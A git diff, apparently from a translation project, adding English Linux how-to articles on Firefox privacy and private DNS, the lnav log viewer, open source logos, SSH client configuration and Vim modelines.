+ +You can use the Random Agent Spoofer by clicking its icon on the Firefox menu bar. A drop down will appear with different browser options to emulate. One of the better options is to select "Random Desktop" and a random interval to change. This way, there is absolutely no pattern to track. It also ensures that you only get the desktop versions of sites. + +### System Settings + +### Private DNS + +Avoid the use of Public or ISP DNS servers! Even though you configure your browser to the absolute privacy standard, your DNS query against public DNS server reveals all domains you have visited. Services such as Google Public DNS ( IP's: 8.8.8.8, 8.8.4.4 ) will log your IP address, information about your ISP and geolocation. This information may be shared as part of any legal processes and enforceable governmental requests. + +> **What information does Google log when I use the Google Public DNS service?** +> +> The Google Public DNS privacy page has a complete list of information that we collect. Google Public DNS complies with Google's main privacy policy, available at our Privacy Center. Your client IP address is only logged temporarily (erased within a day or two), but information about ISPs and city/metro-level locations are kept longer for the purpose of making our service faster, better, and more secure. +> REF: `https://developers.google.com/speed/public-dns/faq#privacy` + +From this reason, if possible configure and use your private non-forwarding DNS server. Nowadays, this task may be as trivial as a deployment of some preconfigured DNS server Docker container on your local host. For example, given that the docker service is already installed on your system, the below command will deploy your private local DNS server: +``` +# docker run -d --name bind9 -p 53:53/udp -p 53:53 fike/bind9 +``` +DNS server is now up and running: +``` +# dig @localhost google.com +; <<>> DiG 9.9.5-9+deb8u6-Debian <<>> @localhost google.com +; (2 servers found) +;; global options: +cmd +;; Got answer: +;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 51110 +;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 4, ADDITIONAL: 5 + +;; OPT PSEUDOSECTION: +; EDNS: version: 0, flags:; udp: 4096 +;; QUESTION SECTION: +;google.com. IN A + +;; ANSWER SECTION: +google.com. 242 IN A 216.58.199.46 +``` +Now, set your nameserver within`/etc/resolv.conf `to: +``` + +nameserver 127.0.0.1 +``` + +### Closing Thoughts + +No security or privacy solution is perfect. The steps in this guide are definitely an improvement, though. If you are really serious about privacy, the Tor Browser `https://www.torproject.org/projects/torbrowser.html.en` is a better option. Tor is a bit overkill for daily use, but it actually does employ some of the same measures outlined in this guide. + +-------------------------------------------------------------------------------- + +via: https://linuxconfig.org/protecting-your-privacy-with-firefox-on-linux + +作者:[Nick Congleton][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://linuxconfig.org/protecting-your-privacy-with-firefox-on-linux +[1]:https://linuxconfig.org/protecting-your-privacy-with-firefox-on-linux#h2-1-health-report +[2]:https://linuxconfig.org/protecting-your-privacy-with-firefox-on-linux#h2-2-search +[3]:https://linuxconfig.org/protecting-your-privacy-with-firefox-on-linux#h2-3-do-not-track +[4]:https://linuxconfig.org/protecting-your-privacy-with-firefox-on-linux#h2-4-disable-pocket +[5]:https://linuxconfig.org/protecting-your-privacy-with-firefox-on-linux#h3-1-https-everywhere +[6]:https://linuxconfig.org/protecting-your-privacy-with-firefox-on-linux#h3-2-privacy-badger +[7]:https://linuxconfig.org/protecting-your-privacy-with-firefox-on-linux#h3-3-ublock-origin +[8]:https://linuxconfig.org/protecting-your-privacy-with-firefox-on-linux#h3-4-noscript +[9]:https://linuxconfig.org/protecting-your-privacy-with-firefox-on-linux#h3-5-disconnect +[10]:https://linuxconfig.org/protecting-your-privacy-with-firefox-on-linux#h3-6-random-agent-spoofer +[11]:https://linuxconfig.org/protecting-your-privacy-with-firefox-on-linux#h4-1-private-dns +[12]:https://linuxconfig.org/protecting-your-privacy-with-firefox-on-linux#h1-introduction +[13]:https://linuxconfig.org/protecting-your-privacy-with-firefox-on-linux#h2-firefox-settings +[14]:https://linuxconfig.org/protecting-your-privacy-with-firefox-on-linux#h3-add-ons +[15]:https://linuxconfig.org/protecting-your-privacy-with-firefox-on-linux#h4-system-settings +[16]:https://linuxconfig.org/protecting-your-privacy-with-firefox-on-linux#h5-closing-thoughts diff --git a/sources/tech/20170201 lnav – An Advanced Console Based Log File Viewer for Linux.md b/sources/tech/20170201 lnav – An Advanced Console Based Log File Viewer for Linux.md new file mode 100644 index 0000000000..b040e51264 --- /dev/null +++ b/sources/tech/20170201 lnav – An Advanced Console Based Log File Viewer for Linux.md @@ -0,0 +1,194 @@ +lnav – An Advanced Console Based Log File Viewer for Linux +============================================================ + +[LNAV][3] stands for Log file Navigator is an advanced console based log file viewer for Linux. It does the same job how other file viewers doing like cat, more, tail, etc but have more enhanced features which is not available in normal file viewers (especially, it will comes with set of color and easy to read format). + +This can decompresses all the compressed log files (zip, gzip, bzip) on the fly and merge them together for easy navigation. lnav Merge more than one log files (Single Log View) into a single view based on message timestamps which will reduce multiple windows open. The color bars on the left-hand side help to show which file a message belongs to. + +The number of warnings and errors are highlighted in the display (Yellow & Red), so that we can easily see where the problems have occurred. New log lines are automatically loaded. + +It display the log messages from all files sorted by the message timestamps. Top & Bottom status bars will tell you, where you are in the logs. If you want to grep any particular pattern, just type your inputs on search prompt which will be highlighted instantly. + +The built-in log message parser can automatically discover and extract the each lines with detailed information. + +A server log is a log file which is created and frequently updated by a server to capture all the activity for the particular service or application. This can be very useful when you have an issue with application or service. In log files you can get all the information about the issue like when it start behaving abnormal based on warning or error message. + +When you open a log file with normal file viewer, it will display all the details in plain format (If i want to tell you in straight forward, plain white) it’s very difficult to identify/understand where is warning & errors messages are there. To overcome this kind of situation and quickly find the warning & error message to troubleshoot the issue, lnav comes in handy for a better solution. + +Most of the common Linux log files are located at `/var/log/`. + +**lnav automatically detect below log formats** + +* Common Web Access Log format +* CUPS page_log +* Syslog +* Glog +* VMware ESXi/vCenter Logs +* dpkg.log +* uwsgi +* “Generic” – Any message that starts with a timestamp +* Strace +* sudo +* gzib & bizp + +**Awesome lnav features** + +* Single Log View – All log file contents are merged into a single view based on message timestamps. +* Automatic Log Format Detection – Most of the log format is supported by lnav +* Filters – regular expressions based filters can be performed. +* Timeline View +* Pretty-Print View +* Query Logs Using SQL +* Automatic Data Extraction +* “Live” Operation +* Syntax Highlighting +* Tab-completion +* Session information is saved automatically and restored when you are viewing the same set of files. +* Headless Mode + +#### How to install lnav on Linux + +Most of the distribution (Debian, Ubuntu, Mint, Fedora, suse, openSUSE, Arch Linux, Manjaro, Mageia, etc.) has the lnav package by default, so we can easily install it from distribution official repository with help of package manager. For CentOS/RHEL we need to enable **[EPEL Repository][1]**. + +``` +[Install lnav on Debian/Ubuntu/LinuxMint] +$ sudo apt-get install lnav + +[Install lnav on RHEL/CentOS] +$ sudo yum install lnav + +[Install lnav on Fedora] +$ sudo dnf install lnav + +[Install lnav on openSUSE] +$ sudo zypper install lnav + +[Install lnav on Mageia] +$ sudo urpmi lnav + +[Install lnav on Arch Linux based system] +$ yaourt -S lnav +``` + +If the distribution doesn’t have the lnav package don’t worry, Developer offering the `.rpm & .deb`packages, so we can easily install without any issues. Make sure you have to download the latest one from [developer github page][4]. + +``` +[Install lnav on Debian/Ubuntu/LinuxMint] +$ sudo wget https://github.com/tstack/lnav/releases/download/v0.8.1/lnav_0.8.1_amd64.deb +$ sudo dpkg -i lnav_0.8.1_amd64.deb + +[Install lnav on RHEL/CentOS] +$ sudo yum install https://github.com/tstack/lnav/releases/download/v0.8.1/lnav-0.8.1-1.x86_64.rpm + +[Install lnav on Fedora] +$ sudo dnf install https://github.com/tstack/lnav/releases/download/v0.8.1/lnav-0.8.1-1.x86_64.rpm + +[Install lnav on openSUSE] +$ sudo zypper install https://github.com/tstack/lnav/releases/download/v0.8.1/lnav-0.8.1-1.x86_64.rpm + +[Install lnav on Mageia] +$ sudo rpm -ivh https://github.com/tstack/lnav/releases/download/v0.8.1/lnav-0.8.1-1.x86_64.rpm +``` + +#### Run lnav without any argument + +By default lnav brings `syslog` file when you are running without any arguments. + +``` +# lnav +``` + +[ + ![](http://www.2daygeek.com/wp-content/uploads/2017/01/lnav-advanced-log-file-viewer-1.png) +][5] + +#### To view specific logs with lnav + +To view specific logs with lnav, add the log file `path` followed by lnav command. For example we are going to view `/var/log/dpkg.log` logs. + +``` +# lnav /var/log/dpkg.log +``` + +[ + ![](http://www.2daygeek.com/wp-content/uploads/2017/01/lnav-advanced-log-file-viewer-2.png) +][6] + +#### To view multiple log files with lnav + +To view multiple log files with lnav, add the log files `path` one by one with single space followed by lnav command. For example we are going to view `/var/log/dpkg.log` & `/var/log/kern.log` logs. + +The color bars on the left-hand side help to show which file a message belongs to. Alternatively top bar also showing the current log file name. Most of the application used to open multiple windows or horizontal or vertical windows within the window to display more than one log but lnav doing in different way (It display multiple logs in the same window based on date combination). + +``` +# lnav /var/log/dpkg.log /var/log/kern.log +``` + +[ + ![](http://www.2daygeek.com/wp-content/uploads/2017/01/lnav-advanced-log-file-viewer-3.png) +][7] + +#### To view older/compressed logs with lnav + +To view older/compressed logs which will decompresses all the compressed log files (zip, gzip, bzip) on the fly, add `-r` option followed by lnav command. + +``` +# lnav -r /var/log/Xorg.0.log.old.gz +``` + +[ + ![](http://www.2daygeek.com/wp-content/uploads/2017/01/lnav-advanced-log-file-viewer-6.png) +][8] + +#### Histogram view + +First run `lnav` then hit `i` to Switch to/from the histogram view. +[ + ![](http://www.2daygeek.com/wp-content/uploads/2017/01/lnav-advanced-log-file-viewer-4.png) +][9] + +#### View log parser results + +First run `lnav` then hit `p` to Toggle the display of the log parser results. +[ + ![](http://www.2daygeek.com/wp-content/uploads/2017/01/lnav-advanced-log-file-viewer-5.png) +][10] + +#### Syntax Highlighting + +You can search any given string which will be highlighting on screen. First run `lnav` then hit `/` and type the string which you want to grep. For testing purpose, i’m searching `Default` string, See the below screenshot. +[ + ![](http://www.2daygeek.com/wp-content/uploads/2017/01/lnav-advanced-log-file-viewer-7.png) +][11] + +#### Tab-completion + +The command prompt supports tab-completion for almost all operations. For example, when doing a search, you can tab-complete words that are displayed on screen rather than having to do a copy & paste. For testing purpose, i’m searching `/var/log/Xorg` string, See the below screenshot. +[ + ![](http://www.2daygeek.com/wp-content/uploads/2017/01/lnav-advanced-log-file-viewer-8.png) +][12] + + +-------------------------------------------------------------------------------- + +via: http://www.2daygeek.com/install-and-use-advanced-log-file-viewer-navigator-lnav-in-linux/ + +作者:[Magesh Maruthamuthu][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.2daygeek.com/author/magesh/ +[1]:http://www.2daygeek.com/install-enable-epel-repository-on-rhel-centos-scientific-linux-oracle-linux/ +[2]:http://www.2daygeek.com/author/magesh/ +[3]:http://lnav.org/ +[4]:https://github.com/tstack/lnav/releases +[5]:http://www.2daygeek.com/wp-content/uploads/2017/01/lnav-advanced-log-file-viewer-1.png +[6]:http://www.2daygeek.com/wp-content/uploads/2017/01/lnav-advanced-log-file-viewer-2.png +[7]:http://www.2daygeek.com/wp-content/uploads/2017/01/lnav-advanced-log-file-viewer-3.png +[8]:http://www.2daygeek.com/wp-content/uploads/2017/01/lnav-advanced-log-file-viewer-6.png +[9]:http://www.2daygeek.com/wp-content/uploads/2017/01/lnav-advanced-log-file-viewer-4.png +[10]:http://www.2daygeek.com/wp-content/uploads/2017/01/lnav-advanced-log-file-viewer-5.png +[11]:http://www.2daygeek.com/wp-content/uploads/2017/01/lnav-advanced-log-file-viewer-7.png +[12]:http://www.2daygeek.com/wp-content/uploads/2017/01/lnav-advanced-log-file-viewer-8.png diff --git a/sources/tech/20170202 A look at 6 iconic open source brands.md b/sources/tech/20170202 A look at 6 iconic open source brands.md new file mode 100644 index 0000000000..b692824636 --- /dev/null +++ b/sources/tech/20170202 A look at 6 iconic open source brands.md @@ -0,0 +1,123 @@ +A look at 6 iconic open source brands +============================================================ + + ![A look at 6 iconic open source brands](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/BUSINESS_brandbalance.png?itok=opwotgEh "A look at 6 iconic open source brands") +Image by :  + +opensource.com + +Branding is an integral part of marketing. When it's done right and makes an impact, a simple logo (like a Nike swoosh) becomes a powerful advertisement in of itself. Just drive down any interstate in America and you'll see symbols that tell you about a brand. Like, the golden arches. Even certain color combinations can be identified with a brand without any additional text or images to give further context. Like, Virginia Tech University's maroon and orange; they are a unique color combination that is hard to mistake. + +So, the question is: How is branding important to the open source community? + +There is a strong argument from me, and many others, that yes it does very much. Open source software competes with paid software, and so must define itself as a viable, realistic alternative. It must also be memoriable and make an impact. If an open source software project represents itself with a poorly designed logo, a bad tagline, and inconsistent messaging, it will be hard to get noticed, be remembered, and be taken seriously.  + +There are many projects doing it right that we can look to for inspiration and guidance. Here are six of my favorites. + +### Six open source brands + +### + ![Linux's Tux mascot](https://opensource.com/sites/default/files/resize/linux-300x354.png "Linux&#039;s Tux mascot") + +### Linux + +The beloved Linux penguin is named Tux, and he is considered the mascot, not the logo. + +Tux was created by Larry Ewing, using GIMP 0.54 in 1996. [The story][4], as told by Jeff Ayers, is that Linus Torvalds had a fixation on penguins after being bitten by one at an Australian zoo in 1993\. Torvalds was looking for a fun image for Linux and felt that a fat penguin resting after a meal was the perfect solution. Tux has found his way into video games, cereal commercials, and even has a female pal, named Gown. Tux is as familiar to Linux users as the bitten-apple is to Mac users and the flying window is to Windows users. + + ![Mozilla new logo 2017](https://opensource.com/sites/default/files/resize/mozilla_1-650x185.png "Mozilla new logo 2017") + +### Mozilla + +The [Mozilla][5] Foundation is non-profit organization and [free-software community][6]. + +Recently wrapping up [a long rebranding effort][7], their creative team leader, Tim Murray, wrote, "At the core of this project is the need for Mozilla's purpose and brand to be better understood by more people. Our brand identity—our logo, our voice, our design—is an important signal of what we believe in and what we do." + +In true open source fashion, Mozilla has invited everyone to contribute. "Thousands of emails, hundreds of meetings, dozens of concepts, and three rounds of research later, we have something to share." But, they're still working on the guidelines, so there's still time to get involved. + + ![Firefox logo](https://opensource.com/sites/default/files/firefox_0.png "Firefox logo") + +### Firefox + +[Firefox][8] is Mozilla's flagship software product and a popular [web browser][9]. + +The "fox" in Firefox is actually a red panda, which is a real animal, a cat-like creature native to China. The story is that Firefox was originally nicknamed "Phoenix" to denote its rising from the ashes of Netscape Navigator. The name was changed to Mozilla Firebird after a trademark dispute with Phoenix Technologies. Then, in February 2004, the name was changed to Mozilla Firefox, after the Firebird RDMS project said it caused confusion with its own projects. + +Early logos for Firefox and Phoenix were criticized by interface designer Steve Garrity, who detailed the flaws in the post "[Branding Mozilla: Towards Mozilla 2.0][10]." So, Mozilla invited Garrity to lead better branding efforts. New icons were developed by silverorange, and the final renderings were done by Jon Hicks, who has done branding work for Camino, MailChimp, and Opera. + +In 2013, the Firefox logo was a final clue on "[Jeopardy!][11]" that asked what the animal was in the logo. None of the three contestants knew the answer is a red panda, instead answering "su," "raccoon," and "Excel." + + ![Wilber the Gimp logo](https://opensource.com/sites/default/files/resize/gimp-300x300.png "Wilber the Gimp logo") + +### GIMP + +GIMP's logo is [Wilber the GIMP][12], created on September 25, 1997 by Tuomas Kuosmanen. + +GIMP is an acronym for GNU Image Manipulation Program, and it is used for photo retouching and image manipulation. Wilber has had some accessories added, such as a hard hat, by Simon Budig, and a wizard cap, by Raphaël Quintet. According to GIMP's [Linking to Us][13] page, the use of Wilber is highly encouraged and you can even get the Wilber Construction Kit included in the source code in **/docs/Wilber_Construction_Kit.xcf.gz**. + +What kind of creature is Wilber? Apparently, that's up for discussion. A forum on [gimper.net][14] offers many theories: coyote, panda, dog, or a "Goofy" derivative, just to name a few. A user named "TheWarrior" on [GimpChat.com][15], emailed Kuosmanen directly and was told, "Wilber is an animal of its own species: a 'GIMP.' What a GIMP is, is sort of a joke, because people kept asking it so much: It would be so boring to say it's a dog or a fox or whatever. And when I designed the character, I did not really have any particular animal in mind." + + ![PostgreSQL logo](https://opensource.com/sites/default/files/postgresql.png "PostgreSQL logo") + +### PostgreSQL + +As you've seen and probably know, animals are popular in logos. + +An elephant named [Slonik][16] is part of the logo for [PostgreSQL][17], an open source Relational Database Management System (RDMS). Patrycja Dybka, writing for "Vertabelo," explains that the name is derived from the Russian word for "elephants," which is "slony." Oleg Bartunov said that the logo was first considered in an [email thread][18]. In it, the elephant was suggested by David Yang at St. Joseph's University in Philadelphia: "…but if you want an animal-based logo, how about some sort of elephant? After all, as the Agatha Christie title read, _Elephants Can Remember_." + + ![VLC logo](https://opensource.com/sites/default/files/resize/vlc-300x340.png "VLC logo") + +### VLC media player + +This logo diverges from the animal theme with... a traffic cone. + +VLC is the ubiquitous media player that seems to appear on desktops magically—giving many a taste of open source without even knowing it! VLC is a product of the VideoLAN project, supported by the VideoLAN organization, which is based in France. VideoLAN began in 1996 as a student project at École Centrale Paris. According to Wikipedia, the traffic cone image is a reference to traffic cones collected from the streets of Paris by the École Centrale's Networking Students' Association. The original hand-drawn illustrated logo was re-rendered in 2006 by Richard Oistad. + +Fun tidbits include: + +* Seamus Islwyn's post _[What Does the Traffic Cone Mean in VLC?][1]_ tells us that in the month of December, the VLC cone wears a Santa hat, which disappears on December 31 and reverts back to the original cone. +* Some say that VLC stands for "Very Large Cone" or the cone was chosen because of a connection with Cone, France. +* Is the "official" story accurate? An exchange on the [VideoLAN Forum][2] between VLC's Jean-Baptiste Kempf and users seems to indicate that the traffic cone collection theory, as well as the funnel, the construction zone, the megaphone, and several other theories, may not be correct. + +Will we ever get the definitive answer on the origins of the VLC traffic cone? My personal theory: It's "Saturday Night Live's" Coneheads. They were from France, remember? Remulak, to be exact. + +**I'd love to hear from you in the comments about which other open source logos you love, hate, and feel excel at representing their brands.** + +-------------------------------------------------------------------------------- + +译者简介: + +Jeff Macharyas - Jeff Macharyas has worked in publishing and graphics for many years and has been the art director for Quick Printing, The American Spectator, the USO’s OnPatrol, Today’s Campus, and other publications as well as a project manager, editor, and circulation manager. Jeff holds a BS in Communications from Florida State University, a Graduate Certificate in Social Media Marketing from Rutgers University and a Master’s in Cybersecurity and Computer Forensics from Utica College. + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/2/six-open-source-brands + +作者:[Jeff Macharyas ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/jeffmacharyas +[1]:http://www.ehow.com/info_10029162_traffic-cone-mean-vlc.html +[2]:https://forum.videolan.org/viewtopic.php?f=5&t=92513 +[3]:https://opensource.com/article/17/2/six-open-source-brands?rate=Lmf1lD4etve4Apqfhw3NUV3SeENsNXhGqTh8OO4PzzQ +[4]:https://en.wikipedia.org/wiki/Tux +[5]:https://www.mozilla.org/en-US/ +[6]:https://en.wikipedia.org/wiki/Mozilla +[7]:https://blog.mozilla.org/opendesign/arrival/ +[8]:https://en.wikipedia.org/wiki/Firefox +[9]:https://en.wikipedia.org/wiki/Web_browser +[10]:http://actsofvolition.com/steven/mozillabranding/ +[11]:http://www.complex.com/pop-culture/2013/09/firefox-jeopardy-answer +[12]:https://www.gimp.org/about/ancient_history.html +[13]:https://www.gimp.org/about/linking.html +[14]:https://gimper.net/threads/what-is-wilber.793/ +[15]:http://gimpchat.com/viewtopic.php?f=4&t=10265 +[16]:http://www.vertabelo.com/blog/notes-from-the-lab/the-history-of-slonik-the-postgresql-elephant-logo +[17]:https://wiki.postgresql.org/wiki/Logo +[18]:http://www.pgsql.ru/db/mw/msg.html?mid=1238939 +[19]:https://opensource.com/user/83821/feed +[20]:https://opensource.com/article/17/2/six-open-source-brands#comments +[21]:https://opensource.com/users/jeffmacharyas diff --git a/sources/tech/20170202 How to Configure Custom SSH Connections to Simplify Remote Access.md b/sources/tech/20170202 How to Configure Custom SSH Connections to Simplify Remote Access.md new file mode 100644 index 0000000000..bf91fa52ff --- /dev/null +++ b/sources/tech/20170202 How to Configure Custom SSH Connections to Simplify Remote Access.md @@ -0,0 +1,166 @@ +How to Configure Custom SSH Connections to Simplify Remote Access +============================================================ + +SSH (SSH client) is a program for remotely accessing a machine, it enables a user to [execute commands on a remote host][2]. It is one of the most recommended method for logging in to a remote host, since it is designed to provide secure encrypted communications between two untrusted hosts over an insecure network. + +SSH uses both a system-wide as well as a user-specific (custom) configuration file. In this tutorial, we will explain how to create a custom ssh configuration file and use certain options to connect to remote hosts. + +#### Requirements: + +1. You must have installed [OpenSSH client on your Linux desktop][1]. +2. Understand the common options used for remote connections via ssh. + +#### SSH Client Config Files + +Below are the locations of the ssh client configuration files: + +1. `/etc/ssh/ssh_config` – this is the default, system-wide configuration file. It contains settings that apply to all users of ssh client machine. +2. `~/.ssh/config` or `$HOME/.ssh/config` – is the user-specific/custom configuration file. It has configurations that apply to a specific user. It therefore overrides default settings in the system-wide config file. This is the file we will create and use. + +By default, users are authenticated in ssh using passwords, however, you can setup [ssh passwordless login using ssh keygen][3] in 5 simple steps. + +Note: In case the directory `~/.ssh` does not exist on your desktop system, create it with the following permissions. + +``` +$ mkdir -p ~/.ssh +$ chmod 0700 ~/.ssh +``` + +The chmod command above implies that only the user can have read, write and execute permissions on the directory as required by ssh settings. + +### How To Create User Specific SSH Configuration File + +This file is usually not created by default, so you need to create it with the read/write permissions for only the user. + +``` +$ touch ~/.ssh/config +$ chmod 0700 ~/.ssh/config +``` + +The above file contains sections defined by hosts specifications, and a section is only applied to hosts that match one of the patterns set in the specification. + +The conventional format of `~/.ssh/config` is as follows, and all empty lines as well as lines starting with `‘#’` are considered as comments: + +``` +Host host1 +ssh_option1=value1 +ssh_option2=value1 value2 +ssh_option3=value1 +Host host2 +ssh_option1=value1 +ssh_option2=value1 value2 +Host * +ssh_option1=value1 +ssh_option2=value1 value2 +``` + +From the format above: + +1. Host host1 – is a header definition for host1, this is where a host specification starts and it ends with the next header definition, Host host2 making a section. +2. host1, host2 are simply host aliases to use on the command line, they are not the actual hostnames of the remote hosts. +3. The configuration options such as ssh_option1=value1, ssh_option2=value1 value2 apply to a matched host and should be indented for well organized formatting. +4. For an option such as ssh_option2=value1 value2, the value value1 is considered first, then value2. +5. The header definition Host * (where `*` is a pattern – wildcard that matches zero or more characters) will match zero or more hosts. + +Still considering the format above, this is how ssh reads the config file. If you execute a ssh command to remotely access host1 like so: + +``` +$ ssh host1 +``` + +The above ssh command will does the following things: + +1. match the host alias host1 in the config file and applies the options set under the definition header, Host host1. +2. then moves to the next host section, Host host2 and finds that the name provided on the command line doesn’t match, so no options are used from here. +3. It proceeds to the last section, Host *, which matches all hosts. Here, it applies all the options in this section to the host connection. But it can not override any values of options that where already used in the previous section(s). +4. The same applies to host2. + +### How To Use User Specific SSH Configuration File + +Once you have understood how the ssh client config file works, you can create it as follows. Remember to use options and values (host aliases, port numbers, usernames and so on) applicable to your server environment. + +Open the config file with your favorite editor: + +``` +$ vi ~/.ssh/config +``` + +And define the necessary sections: + +``` +Host fedora25 +HostName 192.168.56.15 +Port 22 +ForwardX11 no +Host centos7 +HostName 192.168.56.10 +Port 22 +ForwardX11 no +Host ubuntu +HostName 192.168.56.5 +Port 2222 +ForwardX11 yes +Host * +User tecmint +IdentityFile ~/.ssh/id_rsa +Protocol 2 +Compression yes +ServerAliveInterval 60 +ServerAliveCountMax 20 +LogLevel INFO +``` + +A detailed explanation of the above ssh configuration options. + +1. HostName – defines the real host name to log into, alternatively, you can use a numeric IP addresses, it is also permitted (both on the command line and in HostName specifications). +2. User – specifies the user to log in as. +3. Port – sets the port number to connect on the remote host, the default is 22. Use the port number configured in the remote host’s sshd config file. +4. Protocol – this option defines the protocol versions ssh should support in order of preference. The usual values are ‘1’ and ‘2’, multiple versions must be comma-separated. +5. IdentityFile – specifies a file from which the user’s DSA, Ed25519, RSA or ECDSA authentication identity is read. +6. ForwardX11 – defines whether X11 connections will be automatically redirected over the secure channel and DISPLAY set. It has two possible values “yes” or “no”. +7. Compression – it’s used to set compression during the remote connection with the “yes” value. The default is “no”. +8. ServerAliveInterval – sets a timeout interval in seconds after which if no response (or data) has been received from the server, ssh will send a message through the encrypted channel to request a response from the server. The default value is 0, meaning no messages will be sent to the server, or 300 if the BatchMode option has been defined. +9. ServerAliveCountMax – sets the number of server alive messages which may be sent without ssh receiving any response from the server. +10. LogLevel – defines the verbosity level that is used when logging messages from ssh. The allowed values includes: QUIET, FATAL, ERROR, INFO, VERBOSE, DEBUG, DEBUG1, DEBUG2, and DEBUG3\. And the default is INFO. + +The standard way of connecting to any remote Linux host (CentOS 7 – in my case), defined in section two of the config file above, we would normally type the command below: + +``` +$ ssh -i ~/.ssh/id_rsa -p 22 tecmint@192.168.56.10 +``` + +However, with the use of the ssh client configuration file, we can simply type the following command: + +``` +$ ssh centos7 +``` + +You can find more options and usage examples in the ssh client config man page: + +``` +$man ssh_config +``` + +That’s it for now, in this guide, we explained you how to use a user-specific (custom) ssh client config file in Linux. Use the feedback form below to write back to us concerning this article. + +-------------------------------------------------------------------------------- + +译者简介: + +Aaron Kili is a Linux and F.O.S.S enthusiast, an upcoming Linux SysAdmin, web developer, and currently a content creator for TecMint who loves working with computers and strongly believes in sharing knowledge. + +-------------------------------------------------------------------------------- + +via: http://www.tecmint.com/configure-custom-ssh-connection-in-linux/ + +作者:[Aaron Kili][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.tecmint.com/author/aaronkili/ + +[1]:http://www.tecmint.com/install-openssh-server-in-linux/ +[2]:http://www.tecmint.com/execute-commands-on-multiple-linux-servers-using-pssh/ +[3]:http://www.tecmint.com/ssh-passwordless-login-using-ssh-keygen-in-5-easy-steps/ diff --git a/sources/tech/20170202 How to make file-specific setting changes in Vim using Modeline.md b/sources/tech/20170202 How to make file-specific setting changes in Vim using Modeline.md new file mode 100644 index 0000000000..c4fbe3b0e2 --- /dev/null +++ b/sources/tech/20170202 How to make file-specific setting changes in Vim using Modeline.md @@ -0,0 +1,119 @@ +How to make file-specific setting changes in Vim using Modeline +============================================================ + +### On this page + +1. [VIM Modeline][2] + 1. [Usage][1] +2. [Conclusion][3] + +While [plugins][4] are no doubt one of Vim's biggest strengths, there are several other functionalities that make it one of the most powerful and feature-rich text editors/IDEs available to Linux users today. One of these functionalities is the ability to make file-specific setting changes. This ability can be accessed using the editor's Modeline feature. + +In this article, we will discuss how you can use Vim's [Modeline][5] feature using easy to understand examples. + +But before we start doing that, it's worth mentioning that all the examples, commands, and instructions mentioned in this tutorial have been tested on Ubuntu 16.04, and the Vim version we've used is 7.4. + +### VIM Modeline + +### Usage + +As we've already mentioned, Vim's Modeline feature lets you make file-specific changes. For example, suppose you want to replace all the tabs used in a particular file of your project with spaces, and make sure that all other files aren't affected by this change. This is an ideal use-case where Modeline helps you in what you want to do. + +So, what you can do is, you can put the following line in the beginning or end of the file in question: + +``` +# vim: set expandtab: +``` + +There are high chances that if you try doing the aforementioned exercise to test the use-case on your Linux machine, things won't work as expected. If that's the case, worry not, as the Modeline feature needs to be activated first in some cases (it's disabled by default on systems such as Debian, Ubuntu, Gentoo, and OSX for security reasons). + +To enable the feature, open the .vimrc file (located in your home directory), and then add the following line to it: + +``` +set modeline +``` + +Now, whenever you enter a tab and save the file (where the expandtab modeline command was entered), the tab will automatically convert into white spaces. + +Let's consider another use-case. Suppose the default tab space in Vim is set to 4, but for a particular file, you want to increase it to 8. For this, you need to add the following line in the beginning or the end of the file: + +``` +// vim: noai:ts=8: +``` + +Now try entering a tab and you'll see that the number of spaces it covers will be 8.  + +You might have noticed me saying that these modeline commands need to be entered somewhere near the top or the bottom of the file. If you're wondering why this is so, the reason is that the feature is designed this way. The following lines (taken from the official Vim documentation) should make this more clear: + +"The modeline cannot be anywhere in the file: it must be in the first or last few lines. The exact location where vim checks for the modeline is controlled by the `modelines` variable; see :help modelines. By default, it is set to 5 lines." + +And here's what the :help modelines command (referred to in the above lines) says: + +If 'modeline' is on 'modelines' gives the number of lines that is checked for set commands. If 'modeline' is off or 'modelines' is zero no lines are checked. + +Try and put the modeline command beyond the default 5 lines (either from the bottom or from the top) range, and you'll notice that tab spaces will revert to the Vim default - in my case that's 4 spaces. + +However, you can change this behavior if you want, using the following command in your .vimrc file.  + +``` +set modelines=[new-value] +``` + +For example, I increased the value from 5 to 10. + +``` +set modelines=10 +``` + +This means that now I can put the modeline command anywhere between first or last 10 lines of the file. + +Moving on, at any point in time, while editing a file, you can enter the following (with the Vim editor in the command mode) to see the current modeline-related settings as well as where they were last set. + +``` +:verbose set modeline? modelines? +``` + +For example, in my case, the above command produced the following output: + +``` + modeline + Last set from ~/.vimrc + modelines=10 + Last set from ~/.vimrc +``` + +Here are some of the important points you need to know about Vim's Modeline feature: + +* This feature is enabled by default for Vim running in nocompatible (non Vi-compatible) mode, but some notable distributions of Vim disable this option in the system vimrc for security. +* The feature is disabled by default when editing as root (if you've opened the file using 'sudo' then there's no issue - the feature works). +* With '`set'`, the modeline ends at the first colon not following a backslash. And without '`set'`, no text can follow the options. For example, **/* vim: noai:ts=4:sw=4 */** is an invalid modeline. + +### Security Concerns + +Sadly, Vim's Modeline feature can be used to compromise security. In fact, multiple security-related Modeline issues have been reported in the past, including [shell command injection][6], [arbitrary commands execution][7], [unauthorized access][8], and more. Agreed, most of these are old, and would have been fixed by now, but it does give an idea that the Modeline feature could be misused by hackers. + +### Conclusion + +Modeline may be an advanced feature of the Vim editor, but it's not very difficult to understand. There's no doubt that a bit of learning curve involved, but that's not much to ask for given how useful the feature is. Of course, there are security concerns, which means that you should weigh your options before enabling and using the feature. + +Have you ever used the Modeline feature? How was your experience? Share with us (and the whole HowtoForge community) in the comments below. + +-------------------------------------------------------------------------------- + +via: 